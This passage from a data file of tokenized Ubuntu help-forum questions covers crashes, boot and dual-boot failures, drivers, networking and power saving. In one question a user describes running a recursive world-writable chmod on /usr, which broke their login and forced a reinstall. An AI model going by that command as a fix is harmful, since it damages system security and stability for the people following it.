directory , when running i get this : pst007x @ pst007x-serval-professional : ~ $ audacity ( process:28364 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( process:28364 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised ( process:28364 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :display after class was initialised ( process:28364 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :default-icon after class was initialised segmentation fault pst007x @ pst007x-serval-professional : ~ $ i checked installed files using synaptic package manager , then checked permissions : pst007x @ pst007x-serval-professional : ~ $ sudo chmod -r 777 /usr [ sudo ] password for pst007x : pst007x @ pst007x-serval-professional : ~ $ audacity ( process:31026 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( process:31026 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised ( process:31026 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :display after class was initialised ( process:31026 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :default-icon after class was initialised segmentation fault pst007x @ pst007x-serval-professional : ~ $ edit . after the above , i rebooted and was no longer able to login . so i did a fresh install . not a bad thing since the original install on the this system was 10.10 . working ok after fresh install . thank you for taking the time to post answers and suggestions..
401179	force 16:9 from 4:3 , intel graphics	is there a way to force 4:3 screen resolution/scale to 16:9 ? i wan na be able to run 1024x768 in a 16:9 scale ( fullscreen ) on my notebook . so far its only 1366x768 that is scaling to 16:9 . i have a intel速 sandybridge mobile graphic card . tried to use compizconfig with no luck . i 'm running ubuntu 13.10 with gnome desktop .
401183	ubuntu vm install error [ 233.209703 ] hub 2-2:2:1.0 : hub_port_status failed ( err = -110 )	just installed ubuntu using vm fusion , all went well but i get 2 errors below , could anyone advise ? [ 233.209703 ] hub 2-2:2:1.0 : hub_port_status failed ( err = -110 ) [ 233.209703 ] hub 2-2:2:1.0 : connect-debounce failed , port 1 disabled cheers for any help .
401185	how can i identify which device/keycode is being used ?	i am trying to reassign the functions on the buttons of my logitech g700 mouse . using xinput -- list , i see that this counts as two devices ( four if you include the wired/wireless differences ) . 48 will @ will-laptop ~ ] $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ microsoft natural® ergonomic keyboard 4000 id=10 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=15 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=17 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=18 [ slave pointer ( 2 ) ] the problem is that there are non-default assignments to the buttons , so xev does n't show things like `` button 12 '' or whatever , it just shows the keystrokes assigned to the button ( i.e . keypress ctrl_l , keypress `` w '' , keyrelease ctrl_l , keyrelease `` w '' ) . it does n't show the device and so i 'm not sure how to reassign what the key should do . also , as near as i can tell , there is no way to do a hardware reset of the on-board memory profiles , so i ca n't reset the mouse to actually give me a `` button 7 '' or whatever . i am using ubuntu 13.10 . here is what i get from xev when i try the `` tilt wheel to left '' button . keypress event , serial 40 , synthetic no , window 0x4a00001 , root 0x90 , subw 0x0 , time 13142771 , ( 115,109 ) , root : ( 2844,1831 ) , state 0x10 , keycode 37 ( keysym 0xffe3 , control_l ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keypress event , serial 40 , synthetic no , window 0x4a00001 , root 0x90 , subw 0x0 , time 13142771 , ( 115,109 ) , root : ( 2844,1831 ) , state 0x14 , keycode 25 ( keysym 0x77 , w ) , same_screen yes , xlookupstring gives 1 bytes : ( 17 ) `` '' xmblookupstring gives 1 bytes : ( 17 ) `` '' xfilterevent returns : false keyrelease event , serial 40 , synthetic no , window 0x4a00001 , root 0x90 , subw 0x0 , time 13142935 , ( 115,109 ) , root : ( 2844,1831 ) , state 0x14 , keycode 37 ( keysym 0xffe3 , control_l ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 40 , synthetic no , window 0x4a00001 , root 0x90 , subw 0x0 , time 13142935 , ( 115,109 ) , root : ( 2844,1831 ) , state 0x10 , keycode 25 ( keysym 0x77 , w ) , same_screen yes , xlookupstring gives 1 bytes : ( 77 ) `` w '' xfilterevent returns : false`
401187	how to install a clock face on my desktop ?	i just installed 12.04 and would like to jazz it up a little with a nice-looking clock face on my desktop . any suggestions ... ? thx
401190	`` problem with audio playback '' on skype	i have ubuntu 12.04 lts 64bit and from the beginning skype is not working . when i press the video call button starts a call and shows me a warning that has problem with audio playback . i recently deleted windows 7 and putted ubuntu 12 . 04 but i do n't have drivers for ubuntu . when i press call button nothing happened so i think that my problem is microphone recording problem . i have compaq presario cq58 series 100 and i can not find drivers except the .exe for windows
401192	impossible to install php5	i had php5 installed today , and , i do n't remember how , but i guess it not installed anymore ... when i try something like that : aptitude install php5-cli it tells me that no version of package php5-cli is available ... i 'm on ubuntu 10.04 lts what can i do ?
401194	searched for hours need help . wubi 12.04 wo n't boot after shrinking partition	thanks in advance for the help . i 've learnt a little bit reading through for the last so many hours and have finally given up and have a question ... i installed 12.04 onto my hdd d : used it for a while and everything was great . later i shrunk my d : so that i could make the unallocated space into a new partition to use ... unfortunately my ubuntu now wo n't boot due to the error message below but please read on as i have some specifics that i would like help with ... '' the os could n't be loaded because the file \ubuntu\winboot\wubildr.mbr is missing or contains error i have been to this page : boot manager is showing \ubuntu\winboot\wubildr.mbr is missing or contains error and seen the duplicate and the link etc . i would gladly uninstall and reinstall but i have some files on my ubuntu ( on the root.disk as i 've come to understand ) that i need . should have put them on my other partition in the first place i guess and i would n't have this problem right ? ok so ... without booting from a cd can i access the files on my root.disk or better yet fix the booting issue ? reading the below link is the boot issue is because i changed the partition where the wubi file was installed and therefore has a new uuid ? ( not sure what this or a uuid yet though sorry ) . i see the instructions but do n't understand how to see the grub menu and need some easier instructions i guess . not even sure how to get a terminal up as i ca n't boot my wubi ... wubi install no longer boots thanks again for the help , dan
401196	dual boot win 8.1 ok , ubuntu 13.10 stops launch at grub4dos	i have scoured the net and this site and trying everything to get this to work . i have , currently , windows 8.1 installed and i am trying to install ubuntu 13.10 so i can dual boot them . my hardware is the asus g46vw with the most up-to-date bios , 210 . uefi is disabled along with secure boot and fast boot . i have the main os , windows 8 , installed on my 64gig msata drive and i also have a 750gig internal hdd that i split in half . 400gigs for windows storage and 350 for ubuntu . i have tried the liveusb boot and it does n't ask to install ubuntu along side my windows installation . it says wipe entire disk or i have to choose `` something else . '' i choose that and choose the partition i created for ubuntu . manually create the needed partitions and run the install . once that is completed i reboot my system and it loads into windows . i run easybcd , add the ubuntu boot , save it and reboot . i get the screen asking what to load , win 8.1 or ubuntu . if i choose windows it loads up just fine to the desktop . if i choose ubuntu it brings me to a prompt called grub4dos . this is where i am stuck . i have tried nearly everything to get this working and to no avail . i have tried a lot of solutions to get past the grub4dos screen but i can not . i have no problems blowing everything away and starting again as i really need to get this to work .
401197	how can i close a root process `` unknown tcp '' that shows up in nethogs ?	how can i close a root process `` unknown tcp '' that shows up in nethogs ? i think my box has been pwned and using nethogs i see a root process of `` unknown tcp '' . can anyone tell me if this an expected process , what it may be for and if/how i can close it . i changed my user password to try and stop this person but i am unsure yet if that is enough . update now i am also seeing this.. so pwned ?
401200	netbook : extreme power-saving	i am the happy owner of an asus eeepc 1005px with very low-end hardware and a pretty big battery . i am looking for the most power-saving distribution of linux , and/or kernel attached , because i ca n't go over 4h20 of battery-life , and i used to do more before ( like 6 to 7 hours . `` before '' was always better , you know it ) . my specs : 10 ' - 1024x600 led screen ( maybe it 's lcd , 'cause i had to change it , and ordered one from czechia or something like that on ebay ) cpu intel atom n450 integrated graphics 2gb ddr2 sdram ( i can go back to 1gb if it means more powersave ) hdd 250gb sata 5400rpm integrated : 2x usb2.0 | 1x sdcard | 1x vga | 1x webcam + microphone my typical use : only on battery : class notes ( nano would clearly be enough ... although italics and bold are useful ) always : web search ( + flash for youtube/streaming video ) only on charge : watching movies ( with headphones ) listening to music ( with headphones ) my choices : i was thinking ... maybe i could use two distributions : one for travelling and class , which would be veeeery lightweight and energy-saving , something like minimal arch installation with xfce and only mousepad/midori installed . another one `` regular '' for movies and stuff , like ubuntu with libreoffice , firefox , flashplugin , blablabla . my questions : 1 ) would the power-consuming really differ from one configuration to another ? 2 ) what would be , factually , the most power-efficient kernel , desktop environment and web-browser i should use ? 3 ) among these packages , programs , ideas , which are good ( for power-save , of course ) : pm-powersave , `` powertop recommended settings '' , `` 2d environment '' , `` 32 bit architecture instead of 64 bit '' , linrunner/tlp , laptop-mode-tools , `` high contrast mode '' , `` downclock hardware '' , `` config_matom used in kernel ) '' 4 ) bonus question : can i achieve `` deep power down technology ( c6 ) '' with my netbook and/or tweak voltage , if my bios does n't let me touch anything except global stuffs ?
401201	how i set the home directory and shell for a new user ?	i am using 12.04 on my server . i created a new user using adduser me and passwd me and added it to sudo when i login this is what i see . could not chdir to home directory /home/me : no such file or directory $ i type bash and it begins to look `` normal '' $ bash me @ server : / $ how can i avoid typing bash everytime i login ?
401205	bad sectors on a drive and partial slow speeds after reformat	i have 2 external drives which have some bad sectors , model samsung g2 portable of 640 gb . both are no longer under warranty as they are more than 3 years old . naturally , i moved all my important data on another drives . but , since the number of bad sectors is ( or , more exactly , was ) not very high , several hundreds at most , i intended to keep using them ( for `` junk '' data , which i would not care about if it is suddenly lost ) until they would simply fall apart . i had once a hard drive ( internal ) which showed bad sectors and i was able to use it intensively for more than 18 months after the first bad sectors appeared . but here is a little problem : i reformatted both drive in order to have the bad sectors marked as `` bad '' and re-allocated . but , while the bad sectors dissappeared after the reformat , the reformatting resulted in several sections of the drives ( tipically of 5-10 gb in size ) becoming extremely slow . one of the drives showed bad sectors almost 2 years ago . reformatting removed them and no new ones appeared , but there are small parts of the drive where the writing speed slaws to a crawl ( up to 1-2 mb/s ) . the reading speed is fine over the entire drives . the second drive ( which went bad just a week ago ) again had no bad sectors after reformat anymore and its health status is labeled as ok by hdtune pro ( the tool i use for drive diagnostic ) , but there is at least one part of the drive where the reading speed , this rime , becomes very slow . the part is at the position 48-54 gb on hdtune 's drive map and the reading speed slows down there to 4-5 mb/s . the writing speed is fine over the entire drive . is there any way to fix this ? not to repair the damaged sector ( that is pretty much impossible most of the time ) , but at least to mark the slower sections so that windows wo n't try to write there . the drives are still usable ; the first which went bad had been stable for more than a year with constant usage , but this speed problem can become irritating when you hit the faulty sections . any ideas ? ps : i have replacement drives and i intend to use the faulty drives for data i do n't actually care about . basically , i want to give them a go until they fail for good . moreso , i am not certain that the drives were doomed , so to speak . one of them kept functioning for 2 years after it developed some bad sectors . by most accounts , this is very unlikely to happen in case of physical bad sectors . in addition , the bad sectors disappeared after being rewritten and physical bad sectors ca n't actually be mapped out by conventional diagnostic/repair utilities . if the bad sectors my drives developed were logical ones , then the drives are still very usable . they do continue to work , but they only have a problem with the speed ( one drive with the writing speed , the other with the reading speed ) over some small portions , which i ca n't figure why and it 's a bit annoying .
401213	where is dualboot.sh ?	i want to install ubuntu touch , dualbooted with android , as explained in this section : https : //wiki.ubuntu.com/touch/dualbootinstallation there seems to be one problem though , the link to the dualboot.sh script is broke : http : //humpolec.ubuntu.com/latest/dualboot.sh i searched all trough google , but i ca n't mamage to find a download link for this script . can somebody please enlighten me ?
401215	error mounting hard drive with ubuntu 12.10	i have used my hard drive for months with three others computers with ubuntu 10.04 and another 12.10 and suddenly it stopped working . it does n't want to mount and the error message says : error mounting : mount exited with exit code 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdc1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . how can i access my hard disk again ?
401218	cant boot into os using yumi multi boot from usb	i formatted my 16gb usb to fat32 . downloaded yumi multi boot and installed ubuntu 13.10 & backtrack5 i was getting no default or ui configuration directive found ! boot : _ error . so i changed folder name and two files to syslinux and error is gone . once i try to load either os screen flashes black and nothing happens . any suggestions ? ! goal : is to be able to dual boot into ubuntu and backtrack as well as have a partition for personal files . i also want to be able to download tools and make changes to ubuntu and keep those changes . btw : im a noob trying to learn .
401220	reads my download as `` document ''	i tried to download 12.04 and 13.0 versions of ubuntu on my mac mini which runs os-x 10.7.5 . they download , but the disk images will not load into my recovery hard drive . what might i be doing wrong ? thanks !
401222	pinnacle dc 10+ does not work properly	i have an old card - pinnacle dc-10 plus . some time ago i did n't have any problem with this device . ubuntu recognized it o'k and i used tvtime for watching clips i got from an external video device . so then i did n't use the card for sometime.. today i tried it again but i got a noised green capture.. i guessed that the problem was with my card . so i rebooted to an old winxp and installed the necessary drivers and software . i found my dc10 worked ok . the picture was clean . i returned to ubuntu ( 12.04 - updated ) and looked through logs . i found this in syslog : `` jan 7 01:57:35 uhost01 kernel : [ 2730.078836 ] dc10plus [ 0 ] : vidioc_cropcap - subcapture only supported for compressed capture '' . the message repeated many times . it appears just when i 've started the application uses the device ( vlc , tvtime , xawtv ... ) some investigations were performed but the problem is still actual for me . please help me to get it repaired . the driver is : zoran $ v4l2-ctl -- info driver info ( not using libv4l2 ) : driver name : zoran card type : dc10plus [ 0 ] bus info : pci:0000:02:05.0 driver version : 0.0.0 capabilities : 0x04000007 video capture video output video overlay streaming
401229	why netbeans is still in 7.0 ?	i wonder why netbeans 7.0 is still in software center and is not replaced by 7.4 ? netbeans 7.0.1 released august 1 , 2011
401230	how can i accept microsoft eula agreement for ttf-mscorefonts-installer in the preseed file ?	how can i accept microsoft eula agreement for ttf-mscorefonts-installer in a preseeded install - that is , what d/i foo/bar command do i need to add to my preseed file ?
401232	can you boot a mac with an empty harddrive using an ubuntu iso from a usb written from a windows computer ?	i 've just replaced the harddrive on my mac and was hoping to swap directly to ubuntu as my os . can this be done ? if so , can it be done from a usb written by a windows computer ?
401235	how to compile kernel modules on ubuntu touch ?	i 'd like to use a wifi dongle with the rt5370 chip with ubuntu touch on galaxy nexus ... it seems i need to build and install the driver from source provided by the manufacturer . the makefiles provided by the manufacturer do n't work out of the box ... on desktop ubuntu , /lib/modules is not mounted read-only ... but it is on ubuntu touch . this seems to break the standard workflow of building and installing a kernel module from source . do i need to compile my own kernel and enable the driver at that time ? i would prefer to use the provided image and just add my own kernel modules ... any advice about the right way to add drivers to the preview version of ubuntu touch would be greatly appreciated . cheers , kyle
401241	combine html files in directories and subdirectories	i have many directories named like www.url1.com , www.url2.org , url3.com each one of them containing html files which i want to combine according to the name of each directory . the directories contain subdirectories . the files should be saved in the main directory like url1.html , url2.html , url3.html etc . the directories are being created from wget . the structure looks something like this : /media/data/wget/ www.url1.com/abd/sdff/dsfsad.html , dffas.html ... chd/dfdsf/ ... 3/sfdsgregre/ ... www.url2.org/ ... url3.com/ ... so the combined files must be saved in /media/data/wget/ or in /media/data/ like this : url1.html , url2.html , ... i hope it is clear now . is it possible with the find and cat commands ? can anyone show me how ?
401244	ca n't load windows 7 after choosing it in the grub	my laptop primarily came with ubuntu 12.04 , and i had a friend install windows 7 ultimate for me . the grub used to work upon long pressing of the shift key when they system boots up . upon choosing the designated name for windows by enter key , windows 7 would boot up . this was all fine till last night . this morning , i installed all updates on ubuntu , and then when i wanted to boot windows , it is n't happening . no matter how many times i enter grub and choose windows , its only ubuntu that 's loading . i need desperate help , please : (
401245	ubuntu 12.04.3 lts doesnt recogize windows 7	i am trying to install ubuntu 12.04 lts on my windows 7 laptop . i would like a dual-boot , but the installer does n't recognize the operating system . the installer allows me with 2 choices : erase everything and a custom.. the option for installing ubuntu side by side with current windows is not there . i tried the commands for boot-repair . and here is a link of the summary ... http : //paste.ubuntu.com/6706203/
401248	is there a way i can artificially heat up my machine to do some cooling testing ?	so i have a case mod that i have been working on . it 's a small form factor so i require a creative way to cool the system . i am in the testing stages so i am looking for the best way to crank up the heat through the system . now by heat i mean the cpu running say a few videos and going through some extremely heavy counting program or something like that . is there any program out there that creates heavy processing for a stress test such as this already ? i really just need to measure how much heat this system will put off under a heavy load . not trying to destroy the system either . not really looking for cooling solutions and would rather focus on the program if at all possible . thanks in advance !
401250	how to change close button icon in a custom distro using lxde and icewm ?	how do i change the icon of the close tab button on gedit in a custom distro with lxde and icewm as window manager ? do you know where it resides or how i can change it ? now , it looks like this :
401251	ubuntu 13.10 mouse cursor flickering	my mouse cursor is flickering and disappearing on ubuntu 13.10 . i do n't have a unknown monitor in the display settings .
401260	no motd displaying when logging into ssh	i recently upgraded my box from 13.04 to 13.10 . after the upgrade , i ran into some issues with motd displaying twice ( specifically , /etc/motd was being displayed after the contents of /var/run/motd.dynamic ) . i found a few workarounds and tried them out , but ended up in a situation where no motd is displaying . i reverted any changes ( i believe ) that i made while tinkering to try and get the duplicate motd to be fixed . stuff i checked : /etc/pam.d/sshd has the following : session optional pam_motd.so motd=/run/motd.dynamic noupdate session optional pam_motd.so # [ 1 ] /etc/pam.d/login has the following : session optional pam_motd.so motd=/run/motd.dynamic noupdate session optional pam_motd.so /etc/ssh/sshd_config has these lines : usepam yes printmotd no ( switching this to yes has no effect ) running run-parts /etc/update/motd.d returns what i expect to see .
401266	ca n't scale frequencies , always jumps to lowest	the title pretty much explains it . i know this is not a hardware issue . cpu is an intel core duo output of cpufreq-info : cpufrequtils 008 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 10.0 us . hardware limits : 800 mhz - 2.40 ghz available frequency steps : 2.40 ghz , 2.40 ghz , 1.60 ghz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 800 mhz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 800 mhz . cpufreq stats : 2.40 ghz : -nan % , 2.40 ghz : -nan % , 1.60 ghz : -nan % , 800 mhz : -nan % ( 1 ) analyzing cpu 1 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 1 cpus which need to have their frequency coordinated by software : 1 maximum transition latency : 10.0 us . hardware limits : 800 mhz - 2.40 ghz available frequency steps : 2.40 ghz , 2.40 ghz , 1.60 ghz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 800 mhz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 800 mhz . cpufreq stats : 2.40 ghz : -nan % , 2.40 ghz : -nan % , 1.60 ghz : -nan % , 800 mhz : -nan % ( 1 ) i need my cpu back to be able to hit it 's 2.4 ghz mark . can anyone please help me with this ?
401268	dpkg : error processing cgroup-lite ( -- configure )	i upgrade ubuntu 12.04 server today and i found with this error : # apt-get install -f reading package lists ... done building dependency tree ... ... . reading state information ... done the following package was automatically installed and is no longer required : libcgroup1 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up cgroup-lite ( 1.1.4 ) ... start : job failed to start invoke-rc.d : initscript cgroup-lite , action `` start '' failed . dpkg : error processing cgroup-lite ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : cgroup-lite e : sub-process /usr/bin/dpkg returned an error code ( 1 ) zsh : exit 100 apt-get install -f i have kvm virtuals i managed then with virhs , i ca n't start if shutdown a vm : ( . virsh # start 104 error : failed to start domain 104 error : unable to create cgroup for 104 : no such file or directory
401270	not able to upgrade 9.04	i made the mistake of trying to install windows in place of my ubuntu 11.04 . i neglected to think ahead and create a boot cd . i found an old cd i had with version 9.04 on it and installed on my pc . however , i am having issues of not being able to update this version to newer version 12.04 . i have tried from the terminal window , but have the same issue . any ideas on what other options ? i can not even order a cd from ubuntu website because i can not get the latest firefox download . windows install attempt = never again . please help !
401271	i would like to make my new hp envy 700-230qe desktop a dual boot platform	i am currently running windows 8.1 -- 12gb memory -- 2tb sata hard drive -- rj-45 ethernet connection -- and a premium wireless-n lan card & bluetooth does anyone have any information as to how i should partition my hard drive ( i was thinking 50-50 for windows & ubuntu ) plus anything on configuring my peripherals ? ? ? regards , garth
401273	how do you create a live persistent ubuntu usb on a mac that will boot to a mac or pc ?	hello i have actually successfully created a live ubuntu usb ( 12.04.3 64-bit on 8gb liveusb ) using unetbootin , however it is not persistent and will not boot on a mac . or , if anyone has any suggestions on how to edit the .iso file so it boots from a mac and is persistent , that would be great too . i am running osx mavericks so the application would have to run on mavericks too . i tried following http : //ubuntuforums.org/showthread.php ? t=2174630 ans , as suggested below , chose guid partition ( not mbr ) and then add persistent word in grub.cfg file . and after i booted and changed a few settings , i tried to reboot using the restart option in the ubuntu menu , and it did n't work . i manually powered my computer off and on , but when i tried to boot the second time , i got past the ubuntu logo and then my screen went black . i tried this some more times and got the same result . here is my text from the grub.cfg file : if loadfont /boot/grub/font.pf2 ; then set gfxmode=auto insmod efi_gop insmod efi_uga insmod gfxterm terminal_output gfxterm fi set menu_color_normal=white/black set menu_color_highlight=black/light-gray menuentry `` try ubuntu without installing '' { set gfxpayload=keep linux /casper/vmlinuz.efi persistent file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- initrd /casper/initrd.lz } menuentry `` install ubuntu '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- initrd /casper/initrd.lz } menuentry `` check disc for defects '' { set gfxpayload=keep linux /casper/vmlinuz.efi boot=casper integrity-check quiet splash -- initrd /casper/initrd.lz }
401274	why does n't apt does n't know that i have some applications already installed from sources ?	if i install something through source , and install it , when apt-get something else , apt-get ca n't find the app i installed through source as dependency , how can i solve this problem ?
401277	how to make dual monitors output the same color ?	i have two monitors of different models connected to one video adapter . the color of output is very different . is there a way that somehow i could get an icc for one monitor based on the other ? for example i give the tool a photo of both monitors displaying the same simple color , so the tool could compare the color and set the color of the bad one .
401278	external hard drive doesnt recognized	need help here , my 1tb external hard drive ( usb3.0 ) doesnt seem to be recognized when i plug it in . but if works fine under windows 7 using fdisk -l i got this messages : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0000ffc8 device boot start end blocks id system /dev/sda1 * 1 6079 48827392 83 linux /dev/sda2 6079 30402 195367937 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 6079 6322 1951744 82 linux swap / solaris /dev/sda6 6323 18480 97654784 83 linux /dev/sda7 18480 30402 95759360 b w95 fat32 using dmesg | tail -n 20 , i got this : [ 88445.691129 ] scsi 8:0:0:0 : uas_eh_bus_reset_handler tag -1 [ 88445.691134 ] scsi 8:0:0:0 : sense urb submission failure [ 88455.688914 ] scsi 8:0:0:0 : uas_eh_abort_handler tag -1 [ 88455.688918 ] scsi 8:0:0:0 : uas_eh_device_reset_handler tag -1 [ 88455.688921 ] scsi 8:0:0:0 : uas_eh_target_reset_handler tag -1 [ 88455.688924 ] scsi 8:0:0:0 : uas_eh_bus_reset_handler tag -1 [ 88455.688928 ] scsi 8:0:0:0 : device offlined - not ready after error recovery [ 88455.888960 ] usb 1-1.1 : new high speed usb device using ehci_hcd and address 7 [ 88456.372757 ] usb 1-1.1 : device not accepting address 7 , error -71 [ 88456.389094 ] hub 1-1:1.0 : unable to enumerate usb device on port 1 [ 88458.180563 ] usb 1-1.2 : new high speed usb device using ehci_hcd and address 9 [ 88458.286533 ] scsi9 : uas [ 88479.667616 ] scsi 9:0:0:0 : uas_eh_abort_handler tag -1 [ 88479.667626 ] scsi 9:0:0:0 : uas_eh_device_reset_handler tag -1 [ 88479.667631 ] scsi 9:0:0:0 : uas_eh_target_reset_handler tag -1 [ 88479.667634 ] scsi 9:0:0:0 : uas_eh_bus_reset_handler tag -1 [ 88479.671632 ] usb 1-1.2 : urb bad status -71 [ 88479.739783 ] usb 1-1.2 : reset high speed usb device using ehci_hcd and address 9 [ 88479.832640 ] scsi 9:0:0:0 : device offlined - not ready after error recovery [ 90580.762017 ] usb 1-1.2 : usb disconnect , address 9 using tail -f /var/log/syslog , i got : jan 7 09:28:19 spil-desktop kernel : [ 91704.636075 ] usb 1-1.2 : new high speed usb device using ehci_hcd and address 11 jan 7 09:28:19 spil-desktop kernel : [ 91704.742106 ] scsi11 : uas jan 7 09:28:40 spil-desktop kernel : [ 91725.927201 ] scsi 11:0:0:0 : uas_eh_abort_handler tag -1 jan 7 09:28:40 spil-desktop kernel : [ 91725.927211 ] scsi 11:0:0:0 : uas_eh_device_reset_handler tag -1 jan 7 09:28:40 spil-desktop kernel : [ 91725.927215 ] scsi 11:0:0:0 : uas_eh_target_reset_handler tag -1 jan 7 09:28:40 spil-desktop kernel : [ 91725.927218 ] scsi 11:0:0:0 : uas_eh_bus_reset_handler tag -1 jan 7 09:28:40 spil-desktop kernel : [ 91725.931191 ] usb 1-1.2 : urb bad status -71 jan 7 09:28:40 spil-desktop kernel : [ 91725.999344 ] usb 1-1.2 : reset high speed usb device using ehci_hcd and address 11 jan 7 09:28:41 spil-desktop kernel : [ 91726.092197 ] scsi 11:0:0:0 : device offlined - not ready after error recovery thanks for your help .
401279	outgoing network connections fail after a few seconds	i just got back to my university and discovered that ubuntu 13.10 has issues maintaining network access now . after a minute or less of proper connectivity , i lose the arp entry for the gateway and my computer begins to continuously send arp requests for the gateway but receives no response . i manually inserted the arp entry for the gateway after getting the mac for it from the short period that it is connected . this stops the flood of arp requests , but there are no responses to dns requests . the syslog shows no change in status nor does network-manager . i have noticed that when the connection is working , dns lookups are very slow . dns requests are also routed through the local loopback interface . i was not the only person to have issues with ubuntu 13.10 , so i talked with it and verified that the only change to the network was the change of a controller for the access points , which should have nothing to do with the current issue . the network is secured with peap/mschapv2 . there has been no issues on windows machines , nor ubuntu machines running a different version that i know of , in fact the head of it is running ubuntu 13.04 without issue . before winter break , i had been using wicd due to issues with the iwl driver on this network setup among other issues . during break i was utilizing a wpa2-psk network at home without issues . after getting back , wicd would not allow the network connection to stay active due to authentication issues so i re-installed network manager , but that issue was apparently related to the authentication server and has since been fixed . i have not tried wicd since then because the current issue appears to be dns and routing related instead of authentication like the previous one . i have seen the issue on an intel-6300n and a tp-link4800n wireless card while using the up-to-date ubuntu 13.10 . these same machines connect without a hitch while running windows 7 . if there are any configurations or logs that will help solve the problem let me know . i have several different machines to try fixes on , including a fresh install of ubuntu 13.10 .
401281	updated xserver and now i get a black screen / can not write bytes : broken pipe	i got a new cinq monitor for my laptop and i tried following the instructions at http : //how-to.cc/get-a-displaylink-video-adapter-working-with-ubuntu-12-04 for updating the necessary drivers . i followed the first step by running apt-get install xserver-xorg-video-displaylink in the terminal . i recieved a message saying that there were uninstalled dependencies , so i installed the dependencies and then the apt-get install xserver-xorg-video-displaylink command successfully completed/installed the driver . i then restarted my computer . upon reboot all i get is a purple screen followed by a black screen if the cinq monitor is unplugged or a message saying can not write bytes : broken pipe if the cinq monitor is plugged in . i am not sure how to undo the driver change or reinstall the original drivers . any help is appreciated as i am a total ubuntu noob . i have ubuntu 12.0.4
401284	having trouble booting into ubuntu : may or may not involve that `` /dev/mapper/cryptswap1 '' issue	complete noob here with a problem ... i have recently installed ubuntu 12.04 onto my computer ( default os is windows 8 ) . when i tried to boot ubuntu , the first thing that flashes on screen is the `` efidisk read error '' before the grub screen is shown . when i try to run ubuntu from there , the `` /dev/mapper/cryptswap1 is not ready yet or not present '' pops up . nothing happen when i wait , and by nothing , i mean it seems as if the computer is stuck . if i press s , i eventually get stuck on the splash screen . i saw some solutions to the /dev/mapper/cryptswap1 issue , but they seem to assume that you can successfully boot ubuntu , which i ca n't do right now . it always gets stuck at the splash screen . if it 's of any importance , i did install ubuntu while i had windows 8 's fast startup on . i do n't know how this is important , except for how it can potentially cause the `` efidisk read error . '' the thing is , the `` efi disk read error '' appeared even after i turned fast start off . can anyone help me with this issue , or this combination of issues ?
401285	failed to generate keystone db	i 've tried to install openstack havana on my ubuntu 12.04 . but trouble come when i tried to generate keystone database with `` keystone-manage db_sync '' bellow error meessage appear when i try to generated my keystone db $ keystone-manage db_sync traceback ( most recent call last ) : file `` /usr/local/bin/keystone-manage '' , line 4 , in < module > from pkg_resources import require ; require ( 'keystone==2013.2.a104.g3ed9c32 ' ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 2711 , in < module > parse_requirements ( __requires__ ) , environment ( ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 584 , in resolve raise distributionnotfound ( req ) pkg_resources.distributionnotfound : sqlalchemy > =0.7.8 , < =0.7.9 based on that log , it said that sqlalchemy is not found , but i have installed it using apt-get install python3-sqlalchemy* but keystone still not working now any clue how to solve this issue ? thanks
401286	how to set firefox to use transmission ?	i am trying to download torrents and when i select a torrent it asks for a application and there is n't one in the default and upon searching /bin i find none . i do some searching and see that i can tell firefox what app to use for magnet links , magnet doesnât even show up in the list of things i can associate a default application with .
